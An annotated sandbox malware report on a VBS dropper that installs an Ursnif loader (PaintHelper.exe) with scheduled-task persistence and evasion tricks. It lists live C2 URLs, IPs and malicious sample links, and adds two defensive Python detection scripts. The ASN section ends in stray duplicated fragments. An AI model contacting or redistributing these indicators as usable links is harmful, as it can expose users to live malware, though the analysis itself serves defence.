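As an added illustration of the two findings above (the on-disk versus in-memory section-rights comparison and the .text entropy), not code from the report or from Joe Sandbox: a small Python parser that walks the PE section table, computes each section's Shannon entropy and emits the same `.text:ER;.rdata:R;` style layout string, so a disk image and a memory dump can be diffed the way the report does. The PE it analyses is a constructed minimal file built inside the script (not the analysed sample), and the 6.9 cut-off is an assumed threshold chosen to sit just under the report's 6.97.

```python
# Added example (not from the report or Joe Sandbox): section rights and entropy
# of a PE file in the notation the report uses (.text:ER;.rdata:R;...).
# Header layout follows the documented PE/COFF format; PACKED_ENTROPY and the
# sample PE from build_sample_pe() are assumptions made for this demo.
import math
import random
import struct
from typing import List, Tuple

# Section characteristic bits from winnt.h.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumed cut-off: ordinary x86 .text is ~6 bits/byte, the report's was 6.97.
PACKED_ENTROPY = 6.9


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def rights_string(characteristics: int) -> str:
    """Joe Sandbox style rights string, e.g. 'ER' for execute+read."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"),
             (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)


def parse_sections(pe: bytes) -> List[Tuple[str, int, bytes]]:
    """DOS header -> PE signature -> COFF header -> section table;
    returns (name, characteristics, raw section bytes) per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)
        chars = struct.unpack_from("<I", pe, hdr + 36)[0]
        sections.append((name, chars, pe[ptr_raw:ptr_raw + size_raw]))
    return sections


def section_report(pe: bytes) -> List[Tuple[str, str, float, bool]]:
    """(name, rights, entropy, looks_packed): an executable section at or
    above PACKED_ENTROPY is reported as compressed/encrypted code."""
    rows = []
    for name, chars, raw in parse_sections(pe):
        rights = rights_string(chars)
        ent = round(shannon_entropy(raw), 2)
        rows.append((name, rights, ent, "E" in rights and ent >= PACKED_ENTROPY))
    return rows


def layout_string(pe: bytes) -> str:
    """'.text:ER;.data:RW;' summary; diff it between disk image and dump."""
    return "".join(f"{n}:{r};" for n, r, _, _ in section_report(pe))


def build_sample_pe(text: bytes, data: bytes) -> bytes:
    """Constructed, non-runnable PE32 with a .text and a .data section.
    Demo input only; the real PaintHelper.exe is not reproduced here."""
    e_lfanew, opt_size, text_off = 0x40, 0xE0, 0x200
    data_off = text_off + ((len(text) + 0x1FF) & ~0x1FF)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")  # PE32 magic, rest zero

    def hdr(name, vaddr, raw, off, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), off,
                           0, 0, 0, 0, chars)

    headers = (dos + coff + opt
               + hdr(b".text", 0x1000, text, text_off, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
               + hdr(b".data", 0x2000, data, data_off, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE))
    return (headers.ljust(text_off, b"\0") + text).ljust(data_off, b"\0") + data


def demo():
    """Deterministic stand-in for an encrypted .text next to a plain .data."""
    rng = random.Random(2020)
    packed_code = bytes(rng.getrandbits(8) for _ in range(4096))
    plain_data = b"\0" * 1024 + b"Hello"
    pe = build_sample_pe(packed_code, plain_data)
    return section_report(pe), layout_string(pe)


if __name__ == "__main__":
    rows, layout = demo()
    for row in rows:
        print(row)
    print(layout)
```

Run it on a real file by passing `open(path, "rb").read()` to `section_report()`; running it on both the dropped file and a memory dump of the same module is the quickest way to see a section table that was replaced after load.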

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Note: the persistence for the dropped file is the scheduled task jXrjs that the sandbox saw registered at 19:51:24 and then launched (see Simulations below); its action is C:\Users\user\AppData\Local\Temp\PaintHelper.exe. A task whose action runs from a user's Temp directory is an immediate hunting indicator.

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Note: the JoeSecurity_Ursnif rule matched 33 memory dumps of PaintHelper.exe (PID 4192) plus its whole process memory space, all at address 0x03680000, outside the module image at 0x01000000. The payload therefore lives in a dynamically allocated buffer rather than in the mapped image, which is why the on-disk files, the PCAP and the unpacked image at 0x01000000 show no match.
Source: Yara match; File source: 00000004.00000003.816245440.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.813307095.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.948438071.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.809341649.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.808887290.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.811481573.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.813893691.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.815804460.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.810469443.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.814479003.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.815608534.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.815133508.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.812630162.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.810128066.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.812144693.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816907657.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.814943723.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.815313978.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.811173075.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816721090.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.809743965.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.815968516.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.814703114.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.811803755.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816108974.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.810838452.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.812995480.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816495823.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.814184398.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.808312503.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816635881.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.816822684.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000003.813595381.0000000003680000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: PaintHelper.exe PID: 4192, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Note: wscript.exe creates the WSH-Timer window when a script calls WScript.Sleep; together with the two patched Sleep calls listed under Simulations, this points to deliberate delays in the script.
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_4-4628)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4448; Thread sleep time: -30000s >= -30000s
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01019720 GetSystemInfo,GetModuleFileNameA,OpenMutexA,GetTempPathA
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wscript.exe, 00000000.00000003.666596724.0000023B8E973000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAWPK
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.673420729.0000023B90BAE000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.672746903.0000023B90A10000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Note: these strings are Windows' own text: the Host Compute Service error messages and the "Hyper-V RAW" Winsock protocol name live in system libraries mapped into every process, and all six hits are in wscript.exe rather than in the payload. They are not evidence that the script fingerprints the hypervisor. The OpenMutexA in 4_2_01019720 (commonly a single-instance or infection-marker check) and the GetSystemTimeAsFileTime decision chain are the evasion-relevant items in this section.
Program exit points
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; API call chain: ExitProcess graph end node (graph_4-4231)

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01001A88 GetModuleHandleW,LoadLibraryW,GetProcAddress
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_01001015 EntryPoint,GetModuleHandleA,GetProcessHeap,GetCurrentThread,WaitForSingleObject,ExitProcess
Note: GetProcessHeap is flagged because the heap's Flags/ForceFlags fields differ when a process starts under a debugger, but the call is also ordinary runtime start-up code; on its own it is a weak indicator.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe; File created: PaintHelper.exe.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe; Network Connect: 89.191.225.207 80
Note: the "injection or exploit" reading is the signature's default wording for system binaries. Here wscript.exe is executing the submitted script, so the connection is the script's own HTTP activity; the indicator to record is a script host reaching 89.191.225.207:80, not process tampering.
May try to detect the Windows Explorer process (often used for injection)
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmp; Binary or memory string: Progman
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
Source: PaintHelper.exe, 00000004.00000002.947765171.0000000001050000.00000002.00000001.sdmp; Binary or memory string: =Program Managerb
Note: Shell_TrayWnd and Progman are the window classes of the taskbar and the desktop, both owned by explorer.exe; FindWindow on either followed by GetWindowThreadProcessId is the usual way to locate explorer's process for injection.

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_001E857D cpuid
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_001E83D7 memset,RtlInitializeCriticalSection,GetCurrentProcessId,CloseHandle,GetSystemTimeAsFileTime
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; Code function: 4_2_001E857D GetUserNameW
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: MachineGuid is a stable per-installation value and a common ingredient of victim identifiers. The script reads it, and the carved URL http://primecontentstudios.com/pagigpy75.php?uid= (URLs table below) carries a uid parameter; whether one is derived from the other is not established by this run.

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe; WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct
Note: root\SecurityCenter2 exists only on client editions of Windows, and the query enumerates the products registered with Security Center rather than lowering anything; this is reconnaissance of the installed defences. It is the same query an administrator would run, which makes it a useful event to alert on when it is issued from a binary in %TEMP%.

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match; the same 33 PaintHelper.exe memory dumps at 0x03680000 and the PaintHelper.exe (PID 4192) process memory space listed under "Hooking and other Techniques for Hiding and Protection" above.

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match; the same 33 PaintHelper.exe memory dumps at 0x03680000 and the PaintHelper.exe (PID 4192) process memory space listed under "Hooking and other Techniques for Hiding and Protection" above.

Malware Configuration

No configs have been found

Behavior Graph

(Rendered as an image in the original report and not reproduced here. Its legend distinguished processes, signatures, created files, DNS/IP information, dropped and Windows processes, counts of created registry values and files, the implementation language, malicious nodes and Internet access.)

Simulations

Behavior and APIs

Time | Type | Description
19:51:22 | API Interceptor | 2x Sleep call for process: wscript.exe modified
19:51:24 | Task Scheduler | Run new task: jXrjs path: C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Note: the API Interceptor entry means the sandbox shortened two Sleep calls in wscript.exe so the script's delay did not consume the five-minute run; the Task Scheduler entry means the sample registered the task jXrjs and the sandbox launched it. The task is the sample's persistence mechanism.
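
As an added illustration of the persistence seen above, not code from the report: a Python check that parses Windows Task Scheduler definitions (the XML files under %SystemRoot%\System32\Tasks, which use the task schema namespace shown in the code) and flags any action whose command, or a path handed to a launcher such as wscript.exe, resolves under a user-writable directory. It generalises beyond this sample: the three task definitions are constructed for the demo (one mirroring jXrjs, one benign system task, one launcher-style task), and the list of user-writable roots is an assumption to be extended for your environment.

```python
# Added example (not from the report): flag scheduled tasks whose action runs
# from a user-writable path, such as the jXrjs task logged above. Task files
# live under %SystemRoot%\System32\Tasks and use the namespace below. The
# three task XMLs and the USER_WRITABLE list are constructed/assumed for the demo.
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple, Union

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Roots an unprivileged user can write to (assumed list; extend as needed).
USER_WRITABLE = re.compile(
    r"(?i)^(?:[a-z]:\\users\\[^\\]+\\appdata\\(?:local|roaming|locallow)\\"
    r"|[a-z]:\\users\\public\\|[a-z]:\\programdata\\"
    r"|%(?:temp|tmp|appdata|localappdata)%\\)"
)
# Any drive- or variable-rooted path token inside an Arguments string.
PATH_TOKEN = re.compile(r'(?i)(?:[a-z]:\\|%[a-z]+%\\)[^\s"]+')


def exec_actions(task_xml: Union[str, bytes]) -> List[Tuple[str, str]]:
    """(Command, Arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        actions.append((cmd, args))
    return actions


def suspicious_actions(task_xml: Union[str, bytes]) -> List[str]:
    """Actions whose command, or a path passed to a launcher such as
    wscript.exe or cmd.exe, resolves under a user-writable directory."""
    hits = []
    for cmd, args in exec_actions(task_xml):
        candidates = [cmd] + PATH_TOKEN.findall(args)
        if any(USER_WRITABLE.match(c) for c in candidates):
            hits.append(f"{cmd} {args}".strip())
    return hits


def load_task_file(path: str) -> bytes:
    """On-disk task files are UTF-16 XML with a BOM; hand the raw bytes to
    the parser so it honours the declared encoding."""
    with open(path, "rb") as fh:
        return fh.read()


# Constructed sample mirroring the report's task (name jXrjs, action in %TEMP%).
TASK_JXRJS = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\jXrjs</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Users\\user\\AppData\\Local\\Temp\\PaintHelper.exe</Command>
  </Exec></Actions>
</Task>"""

# Constructed benign task: a system binary under %windir%.
TASK_BENIGN = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>%windir%\\system32\\sc.exe</Command><Arguments>start w32time task_started</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed launcher variant: a trusted host whose argument is the payload.
TASK_LAUNCHER = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\wscript.exe</Command>
    <Arguments>"C:\\Users\\user\\AppData\\Roaming\\update.vbs"</Arguments>
  </Exec></Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("jXrjs", TASK_JXRJS), ("benign", TASK_BENIGN),
                            ("launcher", TASK_LAUNCHER)):
        print(label, suspicious_actions(xml_text))
```

To sweep a host, walk %SystemRoot%\System32\Tasks recursively and feed each file through `load_task_file()` and `suspicious_actions()`; the launcher case matters because a task that runs wscript.exe or cmd.exe from System32 looks clean until the argument is inspected.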

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
Nuovo documento 1.vbs | 8% | Virustotal

Dropped Files

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\PaintHelper.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\PaintHelper.exe | 35% | Virustotal

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.PaintHelper.exe.1000000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Note: coverage grows with each layer peeled: 8% of engines flag the 9 MB script, 35% the dropped loader, and the generic crypter signature fires on the unpacked memory image. When triaging, submit the unpacked image and the memory dumps, not only the script.

Domains

Source | Detection | Scanner
trattoriafiori.xyz | 4% | Virustotal
primecontentstudios.com | 3% | Virustotal
site-cdn.onenote.net | 0% | Virustotal

Note: site-cdn.onenote.net is Microsoft OneNote content-delivery traffic from the analysis system, not the sample's; the sample's own domains are trattoriafiori.xyz and primecontentstudios.com.

URLs

Source | Detection | Scanner | Label
http://primecontentstudios.com/pagigpy75.php?uid=_______Set | 0% | Avira URL Cloud | safe
http://primecontentstudios.com/pagigpy75.php?uid=WW | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0B | 0% | Virustotal |
https://sectigo.com/CPS0B | 0% | URL Reputation | safe
http://primecontentstudios.com/pagigpy75.php?uid== | 0% | Avira URL Cloud | safe
https://trattoriafiori.xyz/index.htmRoot | 0% | Avira URL Cloud | safe
http://primecontentstudios.com/ | 3% | Virustotal |
http://primecontentstudios.com/ | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0C | 0% | Virustotal |
https://sectigo.com/CPS0C | 0% | URL Reputation | safe
https://trattoriafiori.xyz/index.htm.xyz/index.htm | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 1% | Virustotal |
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Virustotal |
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://primecontentstudios.com/pagigpy75.php?uid= | 8% | Virustotal |
http://primecontentstudios.com/pagigpy75.php?uid= | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Virustotal |
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://primecontentstudios.com/pagigpy75.php?uid=._o | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | Virustotal |
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# | 0% | URL Reputation | safe
https://trattoriafiori.xyz | 0% | Avira URL Cloud | safe
https://trattoriafiori.xyz/index.htm | 3% | Virustotal |
https://trattoriafiori.xyz/index.htm | 0% | Avira URL Cloud | safe
https://trattoriafiori.xyz/index.htmL2 | 0% | Avira URL Cloud | safe

Note: the sectigo.com OCSP, CRL and CPS entries come from an Authenticode certificate chain carried in one of the analysed binaries (Sectigo RSA Code Signing CA, COMODO time-stamping CA); trailing characters such as 0B, 0C, 0r, 0s and 0# are the adjacent ASN.1 bytes the string carver picked up, not part of the URL. Likewise the uid= variants (_______Set, WW, ==, ._o) and index.htmRoot / index.htmL2 are single strings carved at different moments. The indicators worth recording are http://primecontentstudios.com/pagigpy75.php?uid= and https://trattoriafiori.xyz/index.htm; "safe" verdicts from URL reputation services for freshly registered infrastructure mean only that nothing has been reported yet.

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
Rule JoeSecurity_Ursnif (description "Yara detected Ursnif", author Joe Security) matched each of the 33 PaintHelper.exe memory dumps at 0x03680000 listed under "Hooking and other Techniques for Hiding and Protection" above, and the process memory space of PaintHelper.exe PID 4192.

Unpacked PEs

No yara matches

                                                                      Sigma Overview

                                                                      No Sigma rule has matched

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
unknown | http://downloadmyinboxhelper.com | malicious | 52.210.2.133
unknown | https://onedrive.live.com/redir?resid=57A66C00F6A0889D%21174&authkey=%21AFlxjJ8AqLyC7WA&page=View&wd=target%28Quick%20Notes.one%7C413ef381-aa3c-4062-b71e-89358e1bcdfe%2FFOR%20YOUR%20REFERENCE%7C4a278fbe-a14f-4f9f-a8cc-a351162a9dd3%2F%29 | malicious | 104.16.132.229
unknown | DOC014293_2020_04_09.xls | malicious | 52.114.74.44
unknown | winlogon.exe | malicious | 185.248.162.102
unknown | https://1drv.ms/u/s!AjZbJqQuduUdaN8z0dBgPMZd3Ws?e=rZ5iVc | malicious | 173.209.39.29
unknown | http://groverwy.buzz/WeTransfer | malicious | 104.22.45.170
unknown | coverage_WS974.xls | malicious | 51.254.58.126
unknown | coverage_JB324.xls | malicious | 54.225.71.235
unknown | DashlaneInst.exe | malicious | 143.204.101.183
unknown | coverage_MD365.xls | malicious | 51.254.58.126
unknown | https://bitly.com/3catlBm | malicious | 178.33.88.78
unknown | V56hBLPv6K.exe | malicious | 34.193.124.121
unknown | https://test.mycrowd.jp/?u=cGhpbGxpcF9tYXJrc0BpYW1nb2xkLmNvbQ== | malicious | 157.112.183.57
unknown | https://linkedincorporatefile.me/recruiter.pdf | malicious | 5.230.65.20
unknown | http://www.fgoogle.de/mwg-internal/de5fs23hu73ds/files/ACCOR-Collection/js/accor_proxy.js | malicious | 185.53.179.24
unknown | yNqNEspMoI.exe | malicious | 35.244.218.203
unknown | https://melias.se/string/4365850.zip | malicious | 127.0.0.1
unknown | f_000418.exe | malicious | 77.234.45.9
unknown | LRU0033987598750980983.vbs | malicious | 15.188.119.127
Note: "unknown" is the ASN the context lookup could not attribute, so this list groups unrelated samples whose contacted IPs simply lacked ASN data (it even includes 127.0.0.1 and content-delivery addresses). It is not a meaningful pivot to this sample's infrastructure; use the domains and the 89.191.225.207 destination instead.
unknown (second ASN entry) | same associated samples and IPs as the first entry above
                                                                      • 34.193.124.121
                                                                      https://test.mycrowd.jp/?u=cGhpbGxpcF9tYXJrc0BpYW1nb2xkLmNvbQ==Get hashmaliciousBrowse
                                                                      • 157.112.183.57
                                                                      https://linkedincorporatefile.me/recruiter.pdfGet hashmaliciousBrowse
                                                                      • 5.230.65.20
                                                                      http://www.fgoogle.de/mwg-internal/de5fs23hu73ds/files/ACCOR-Collection/js/accor_proxy.jsGet hashmaliciousBrowse
                                                                      • 185.53.179.24
                                                                      yNqNEspMoI.exeGet hashmaliciousBrowse
                                                                      • 35.244.218.203
                                                                      https://melias.se/string/4365850.zipGet hashmaliciousBrowse
                                                                      • 127.0.0.1
                                                                      f_000418.exeGet hashmaliciousBrowse
                                                                      • 77.234.45.9
                                                                      LRU0033987598750980983.vbsGet hashmaliciousBrowse
                                                                      • 15.188.119.127

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.